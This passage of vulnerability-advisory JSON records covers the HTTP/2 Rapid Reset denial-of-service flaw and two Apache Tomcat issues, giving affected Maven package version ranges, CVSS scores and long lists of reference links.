"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/apple/swift-nio-http2/security/advisories/GHSA-qppj-fm5r-hxr3" }, { "type": "WEB", "url": "https://github.com/h2o/h2o/security/advisories/GHSA-2m7v-gc89-fjqf" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44487" }, { "type": "WEB", "url": "https://github.com/caddyserver/caddy/issues/5877" }, { "type": "WEB", "url": 
"https://github.com/dotnet/announcements/issues/277" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/10679" }, { "type": "WEB", "url": "https://github.com/etcd-io/etcd/issues/16740" }, { "type": "WEB", "url": "https://github.com/apache/apisix/issues/10320" }, { "type": "WEB", "url": "https://github.com/alibaba/tengine/issues/1872" }, { "type": "WEB", "url": "https://github.com/akka/akka-http/issues/4323" }, { "type": "WEB", "url": "https://github.com/golang/go/issues/63417" }, { "type": "WEB", "url": "https://github.com/Azure/AKS/issues/3947" }, { "type": "WEB", "url": "https://github.com/varnishcache/varnish-cache/issues/3996" }, { "type": "WEB", "url": "https://github.com/haproxy/haproxy/issues/2312" }, { "type": "WEB", "url": "https://github.com/hyperium/hyper/issues/3337" }, { "type": "WEB", "url": "https://github.com/tempesta-tech/tempesta/issues/1986" }, { "type": "WEB", "url": "https://github.com/junkurihara/rust-rpxy/issues/97" }, { "type": "WEB", "url": "https://github.com/opensearch-project/data-prepper/issues/3474" }, { "type": "WEB", "url": "https://github.com/kazu-yamamoto/http2/issues/93" }, { "type": "WEB", "url": "https://github.com/openresty/openresty/issues/930" }, { "type": "WEB", "url": "https://github.com/ninenines/cowboy/issues/1615" }, { "type": "WEB", "url": "https://github.com/nodejs/node/pull/50121" }, { "type": "WEB", "url": "https://github.com/apache/trafficserver/pull/10564" }, { "type": "WEB", "url": "https://github.com/envoyproxy/envoy/pull/30055" }, { "type": "WEB", "url": "https://github.com/apache/httpd-site/pull/10" }, { "type": "WEB", "url": "https://github.com/nghttp2/nghttp2/pull/1961" }, { "type": "WEB", "url": "https://github.com/akka/akka-http/pull/4325" }, { "type": "WEB", "url": "https://github.com/akka/akka-http/pull/4324" }, { "type": "WEB", "url": "https://github.com/microsoft/CBL-Mariner/pull/6381" }, { "type": "WEB", "url": "https://github.com/facebook/proxygen/pull/466" }, { "type": "WEB", 
"url": "https://github.com/projectcontour/contour/pull/5826" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-go/pull/6703" }, { "type": "WEB", "url": "https://github.com/linkerd/website/pull/1695/commits/4b9c6836471bc8270ab48aae6fd2181bc73fd632" }, { "type": "WEB", "url": "https://github.com/line/armeria/pull/5232" }, { "type": "WEB", "url": "https://github.com/kubernetes/kubernetes/pull/121120" }, { "type": "WEB", "url": "https://github.com/h2o/h2o/pull/3291" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/58f75f665aa81a8cbcf6ffa74820042a285c5e61" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/944332bb15bd2f3bf76ec2caeb1ff0a58a3bc628" }, { "type": "WEB", "url": "https://github.com/kazu-yamamoto/http2/commit/f61d41a502bd0f60eb24e1ce14edc7b6df6722a1" }, { "type": "WEB", "url": "https://netty.io/news/2023/10/10/4-1-100-Final.html" }, { "type": "WEB", "url": "https://my.f5.com/manage/s/article/K000137106" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/cve-2023-44487" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A" }, 
{ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4" }, { "type": "WEB", "url": "https://lists.w3.org/Archives/Public/ietf-http-wg/2023OctDec/0025.html" }, { "type": "WEB", "url": "https://mailman.nginx.org/pipermail/nginx-devel/2023-October/S36Q5HBXR7CAIMPLLPRSSSYR4PCMWILK.html" }, { "type": "WEB", "url": "https://martinthomson.github.io/h2-stream-limits/draft-thomson-httpbis-h2-stream-limits.html" }, { "type": "WEB", "url": "https://msrc.microsoft.com/blog/2023/10/microsoft-response-to-distributed-denial-of-service-ddos-attacks-against-http/2" }, { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-44487" }, { "type": "WEB", "url": "https://www.bleepingcomputer.com/news/security/new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-44487" }, { "type": "WEB", "url": 
"https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487" }, { "type": "WEB", "url": "https://www.darkreading.com/cloud/internet-wide-zero-day-bug-fuels-largest-ever-ddos-event" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5540" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5549" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5558" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5570" }, { "type": "WEB", "url": "https://www.eclipse.org/lists/jetty-announce/msg00181.html" }, { "type": "WEB", "url": "https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487" }, { "type": "WEB", "url": "https://www.netlify.com/blog/netlify-successfully-mitigates-cve-2023-44487" }, { "type": "WEB", "url": "https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/10/10/6" }, { "type": "WEB", "url": "https://www.phoronix.com/news/HTTP2-Rapid-Reset-Attack" }, { "type": "WEB", "url": "https://www.theregister.com/2023/10/10/http2_rapid_reset_zeroday" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/rapid-reset-cve-2023-44487-dos-in-http2-understanding-the-root-cause" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37830987" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37830998" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37831062" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=37837043" }, { "type": "WEB", "url": "https://openssf.org/blog/2023/10/10/http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response" }, { "type": "WEB", "url": 
"https://seanmonstar.com/post/730794151136935936/hyper-http2-rapid-reset-unaffected" }, { "type": "WEB", "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-http2-reset-d8Kf32vZ" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-09" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231016-0001" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240426-0007" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" }, { "type": "WEB", "url": "https://security.paloaltonetworks.com/CVE-2023-44487" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.14" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.0-M12" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.94" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.81" }, { "type": "WEB", "url": "https://ubuntu.com/security/CVE-2023-44487" }, { "type": "WEB", "url": "https://edg.io/lp/blog/resets-leaks-ddos-and-the-tale-of-a-hidden-cve" }, { "type": "WEB", "url": "https://forums.swift.org/t/swift-nio-http2-security-update-cve-2023-44487-http-2-dos/67764" }, { "type": "WEB", "url": "https://gist.github.com/adulau/7c2bfb8e9cdbe4b35a5e131c66a0c088" }, { "type": "WEB", "url": "https://github.com/Kong/kong/discussions/11741" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qppj-fm5r-hxr3" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vx74-f528-fxqg" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xpw8-rcwv-8f8p" }, { "type": "WEB", "url": "https://github.com/apache/httpd/blob/afcdbeebbff4b0c50ea26cdd16e178c0d1f24152/modules/http2/h2_mplx.c#L1101-L1113" }, { "type": 
"WEB", "url": "https://github.com/apache/tomcat/tree/main/java/org/apache/coyote/http2" }, { "type": "PACKAGE", "url": "https://github.com/apple/swift-nio-http2" }, { "type": "WEB", "url": "https://github.com/arkrwn/PoC/tree/main/CVE-2023-44487" }, { "type": "WEB", "url": "https://github.com/bcdannyboy/CVE-2023-44487" }, { "type": "WEB", "url": "https://github.com/caddyserver/caddy/releases/tag/v2.7.5" }, { "type": "WEB", "url": "https://github.com/dotnet/core/blob/e4613450ea0da7fd2fc6b61dfb2c1c1dec1ce9ec/release-notes/6.0/6.0.23/6.0.23.md?plain=1#L73" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-go/releases" }, { "type": "WEB", "url": "https://github.com/grpc/grpc/releases/tag/v1.59.2" }, { "type": "WEB", "url": "https://github.com/icing/mod_h2/blob/0a864782af0a942aa2ad4ed960a6b32cd35bcf0a/mod_http2/README.md?plain=1#L239-L244" }, { "type": "WEB", "url": "https://akka.io/security/akka-http-cve-2023-44487.html" }, { "type": "WEB", "url": "https://arstechnica.com/security/2023/10/how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size" }, { "type": "WEB", "url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-011" }, { "type": "WEB", "url": "https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack" }, { "type": "WEB", "url": "https://blog.cloudflare.com/zero-day-rapid-reset-http2-record-breaking-ddos-attack" }, { "type": "WEB", "url": "https://blog.litespeedtech.com/2023/10/11/rapid-reset-http-2-vulnerablilty" }, { "type": "WEB", "url": "https://blog.qualys.com/vulnerabilities-threat-research/2023/10/10/cve-2023-44487-http-2-rapid-reset-attack" }, { "type": "WEB", "url": "https://blog.vespa.ai/cve-2023-44487" }, { "type": "WEB", "url": "https://bugzilla.proxmox.com/show_bug.cgi?id=4988" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242803" }, { "type": "WEB", "url": "https://bugzilla.suse.com/show_bug.cgi?id=1216123" }, { "type": "WEB", "url": 
"https://cgit.freebsd.org/ports/commit/?id=c64c329c2c1752f46b73e3e6ce9f4329be6629f9" }, { "type": "WEB", "url": "https://chaos.social/@icing/111210915918780532" }, { "type": "WEB", "url": "https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps" }, { "type": "WEB", "url": "https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack" }, { "type": "WEB", "url": "https://community.traefik.io/t/is-traefik-vulnerable-to-cve-2023-44487/20125" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2023-32-vault-consul-and-boundary-affected-by-http-2-rapid-reset-denial-of-service-vulnerability-cve-2023-44487/59715" }, { "type": "WEB", "url": "https://github.com/micrictor/http2-rst-stream" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y" }, { "type": "WEB", "url": "https://github.com/nghttp2/nghttp2/releases/tag/v1.57.0" }, { "type": "WEB", "url": "https://github.com/oqtane/oqtane.framework/discussions/3367" }, { "type": "WEB", "url": "https://go.dev/cl/534215" }, { "type": "WEB", "url": "https://go.dev/cl/534235" }, { "type": "WEB", "url": "https://go.dev/issue/63417" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo" }, { 
"type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo/m/UDd7VKQuAAAJ" }, { "type": "WEB", "url": "https://istio.io/latest/news/security/istio-security-2023-004" }, { "type": "WEB", "url": "https://linkerd.io/2023/10/12/linkerd-cve-2023-44487" }, { "type": "WEB", "url": "https://lists.apache.org/thread/5py8h42mxfsn8l1wy6o41xwhsjlsd87q" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00023.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00024.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00047.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00001.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00012.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/7" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/13/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/13/9" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/18/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/18/8" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/19/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/20/8" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-10-10T21:28:24Z", "nvd_published_at": "2023-10-10T14:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:A" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qvf5-hvjx-wm27", "published": "2024-11-18T12:30:43Z", "modified": "2025-01-24T22:02:57.022869Z", "aliases": [ "BIT-tomcat-2024-52317", "CVE-2024-52317" ], "summary": "Apache Tomcat Request and/or response mix-up", "details": "Incorrect object re-cycling and re-use vulnerability in Apache Tomcat. Incorrect recycling of the request and response used by HTTP/2 requests could lead to request and/or response mix-up between users.\n\nThis issue affects Apache Tomcat: from 11.0.0-M23 through 11.0.0-M26, from 10.1.27 through 10.1.30, from 9.0.92 through 9.0.95.\n\nUsers are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.92" }, { "fixed": "9.0.96" } ] } ], "versions": [ "9.0.93", "9.0.94", "9.0.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.92" }, { "fixed": "9.0.96" } ] } ], "versions": [ "9.0.93", "9.0.94", "9.0.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": 
"ECOSYSTEM", "events": [ { "introduced": "10.1.27" }, { "fixed": "10.1.31" } ] } ], "versions": [ "10.1.28", "10.1.29", "10.1.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M23" }, { "fixed": "11.0.0" } ] } ], "versions": [ "11.0.0-M24", "11.0.0-M25", "11.0.0-M26" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.27" }, { "fixed": "10.1.31" } ] } ], "versions": [ "10.1.28", "10.1.29", "10.1.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M23" }, { "fixed": "11.0.0" } ] } ], "versions": [ "11.0.0-M24", "11.0.0-M25", "11.0.0-M26" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qvf5-hvjx-wm27/GHSA-qvf5-hvjx-wm27.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52317" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/146f94f87ea398fb592c7a20a5ccbef95e9dd72b" }, { "type": "WEB", "url": 
"https://github.com/apache/tomcat/commit/47307ee27abcdea2ee40e33897aca760083de46a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9e840ccacb40881c03a03b1e0746bfba7369b3bd" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/ty376mrxy1mmxtw3ogo53nc9l3co3dfs" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250124-0004" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/11/18/3" } ], "database_specific": { "cwe_ids": [ "CWE-326" ], "github_reviewed": true, "github_reviewed_at": "2024-11-18T21:03:05Z", "nvd_published_at": "2024-11-18T12:15:18Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qxf4-chvg-4r8r", "published": "2020-02-28T01:10:48Z", "modified": "2024-03-14T05:17:09.684982Z", "aliases": [ "BIT-tomcat-2020-1935", "CVE-2020-1935" ], "related": [ "CGA-m48x-5w5p-h4vm" ], "summary": "Potential HTTP request smuggling in Apache Tomcat", "details": "In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. 
Such a reverse proxy is considered unlikely.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", 
